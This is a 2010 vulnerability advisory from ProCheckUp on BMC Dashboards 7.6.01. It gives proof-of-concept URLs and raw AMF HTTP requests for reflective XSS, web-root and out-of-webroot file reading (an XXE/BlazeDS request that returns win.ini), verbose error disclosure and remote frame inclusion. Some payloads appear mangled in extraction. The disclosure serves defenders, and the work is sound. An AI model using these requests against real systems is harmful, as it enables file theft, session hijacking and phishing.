PR10-18: Multiple XSS (Cross Site Scripting) and arbitrary file reading flaws within BMC Dashboards by BMC Vulnerability found: 1st Oct 2010 Vendor informed: Vulnerability fixed: Severity: High Description: BMC Dashboards provides service desk analysts with a dashboard view of aggregated performance indicators, enabling timely fact based decisions. ProCheckUp has discovered that multiple Remedy Knowledge Management pages are vulnerable to reflective XSS attacks, along with a directory traversal vulnerability which allows arbitrary files to be read outside the web-root. Version: 7.6.01 - http://www.bmc.com/ 1) The following demonstrate the reflective XSS flaw a) https://target-domain.foo/bmc_help2u/help_services/html/xx/404.htm b) https://target-domain.foo/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/help_services/demos/frameTst/my0a.jsp&msg="> c) multiple XSS within demo pages https://target-domain.foo/bmc_help2u/help_services/demos/helpTest.jsp?help='> https://target-domain.foo/bmc_help2u/help_services/demos/setChromeDef.jsp?bFlag=&submitVals=Call+setChromeDefBoolean d) Multiple XSS as the AMF stream is unfiltered POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1 Content-Type: application/x-amf Host: target-domain.foo Content-Length: 462 ........null../58..... .. .COflex.messaging.messages.RemotingMessage.timestamp.headers.operation bodysource.remotePassword.remoteUsername.parameters.messageId.timeToLive.clientId.destination......... #. DSId.DSEndpoint.IFDCEEFC2-F318-1B37-7F3A-B438E60525E0..bsd-secure-amf...getUndefinedDataSources .. .qcom.bmc.bsm.dashboards.services.facade.RequestParameters. #. name.version..208Archive..1.0... .Cflex.messaging.io.ArrayCollection .. ..I3DDF906B-55F2-5E38-38C1-6A08D1AC077B..........IFDDDB883-6F0C-D935-5E7B-25CDF25C3538.-dashboardArchiveFacade results:- HTTP/1.1 200 OK Date: Sat, 02 Oct 2010 00:15:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: application/x-amf Content-Length: 4651 ......../58/onStatus....... .SIflex.messaging.messages.ErrorMessage.headers.rootCause body.correlationId.faultDetail.faultString.clientId.timeToLive.destination.timestamp.extendedData.faultCode.messageId .. ..acom.bmc.bsm.dashboards.util.logging.BSDException.message guid!localizedMessage.cause.arguments.priority.traceback.errorCode.causeSummary.System error. Contact your system administrator for assistance. .Kcom.bmc.bsm.dashboards.util.guid.Guid!uniqueIdentifier.AdZZZZZZZZJIiCvq53w9q0gerq4j8y0oq.0 .s?flex.messaging.MessageException.errorMessage."$)logStackTraceEnablednumber codelogged.statusCode..-defaultLogMessageIntro.details#preferredLogLevel+rootCauseErrorMessage . ......)Method 'getUndefinedDataSources' not found...1Cannot invoke method 'getUndefinedDataSourcesfdd4d Consequences: An attacker may be able to cause execution of malicious scripting code in the browser of a user who clicks on a link to Remedy Knowledge Management based site. Such code would run within the security context of the target domain. This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: session IDs) to unauthorised third parties. No authentication is required to exploit this vulnerability. 2) Application is vulnerable to file source code reading limited to the web-root. https://target-domain.foo/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/WEB-INF/web.xml Consequences: File source code reading allows Files to be retrieved from the target server, provided that the location on the file system is known. No authentication is required to exploit this vulnerability. 3) Verbose error pages - when parsing malicious amf messages POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1 Host: target-domain.foo Content-Type: application/x-amf Content-Length: 462 COflex.messaging.messages.RemotingMessagetimestampheadersoperation body sourceremotePasswordremoteUsernameparametersmessageIdtimeToLiveclientIddestination SIflex.messaging.messages.ErrorMessageheadersrootCause bodycorrelationIdfaultDetailfaultStringclientIdtimeToLivedestinationtimestampextendedDatafaultCodemessageId  acom.bmc.bsm.dashboards.util.logging.BSDExceptionmessage guid!localizedMessage causeargumentsprioritytracebackerrorCodecauseSummarySystem error. Contact your system administrator for assistance. Kcom.bmc.bsm.dashboards.util.guid.Guid!uniqueIdentifierAdZZZZZZZZJIiCvq53w9q0gerq4j8y0n80 3;java.io.FileNotFoundException"$?cf:\Program Files\BMC Software\BMCDashboardsForBSM\BSMDashboards\archive\208Archive_1.025350d026634a338.dar (The filename, directory name, or volume label syntax is incorrect): ERRORÇecom.bmc.bsm.dashboards.util.logging.BSDException: System error. Contact your system administrator for assistance. at com.bmc.bsm.dashboards.archive.DashboardArchiveFacadeImpl.readArchiveHelper(DashboardArchiveFacadeImpl.java:585) at com.bmc.bsm.dashboards.archive.DashboardArchiveFacadeImpl.readArchive(DashboardArchiveFacadeImpl.java:526) at com.bmc.bsm.dashboards.archive.DashboardArchiveFacadeImpl.getUndefinedDataSources(DashboardArchiveFacadeImpl.java:193) at sun.reflect.GeneratedMethodAccessor767.invoke(Unknown Source) at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source) at java.lang.reflect.Method.invoke(Unknown Source) at com.bmc.bsm.dashboards.util.transaction.TransactionInvocationHandlerImpl$1.run(TransactionInvocationHandlerImpl.java:66) at com.bmc.bsm.dashboards.util.transaction.TransactionHelperImpl.runInTransaction(TransactionHelperImpl.java:117) at com.bmc.bsm.dashboards.util.transaction.TransactionHelperImpl.runInTransaction(TransactionHelperImpl.java:107) at com.bmc.bsm.dashboards.util.transaction.TransactionInvocationHandlerImpl.invoke(TransactionInvocationHandlerImpl.java:60) at $Proxy54.getUndefinedDataSources(Unknown Source) 4) Vulnerable to directory traversal as uses Adobe BlazeDS, breaking out of the webroot see http://seclists.org/fulldisclosure/2010/Feb/383 POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1 Host: target-domain.foo User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 ( .NET CLR 3.5.30729; .NET4.0C) Content-type: application/x-amf POST DATA ]> bodyclientIdcorrelationId destinationheadersmessageId operationtimestamptimeToLive DSIdDSMessagingVersion nil1 &x3; 500 win.ini ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 [MCI Extensions.BAK] aif=MPEGVideo aifc=MPEGVideo aiff=MPEGVideo asf=MPEGVideo asx=MPEGVideo au=MPEGVideo m1v=MPEGVideo m3u=MPEGVideo mp2=MPEGVideo mp2v=MPEGVideo mp3=MPEGVideo mpa=MPEGVideo mpe=MPEGVideo mpeg=MPEGVideo mpg=MPEGVideo mpv2=MPEGVideo snd=MPEGVideo wax=MPEGVideo wm=MPEGVideo wma=MPEGVideo wmv=MPEGVideo wmx=MPEGVideo wpl=MPEGVideo wvx=MPEGVideo Consequences: Directory traversal allows Files to be retrieved from the target server outside the webroot, provided that the location on the file system is known. Arbitrary file uploading should also be possible, no authentication is required to exploit this vulnerability. 5) Application is vulnerable to remote frame inclusion https://target-domain.foo/bmc_help2u/help_services/html/index.htm?&URL=http://www.procheckup.com Consequences: An attacker may be able to gain access to confidential data, by carry out a phishing attack. Fix: References: http://www.procheckup.com/Vulnerabilities.php Credits: Richard Brain and Jan Fry of ProCheckUp Ltd (www.procheckup.com) Legal: Copyright 2010 Procheckup Ltd. All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.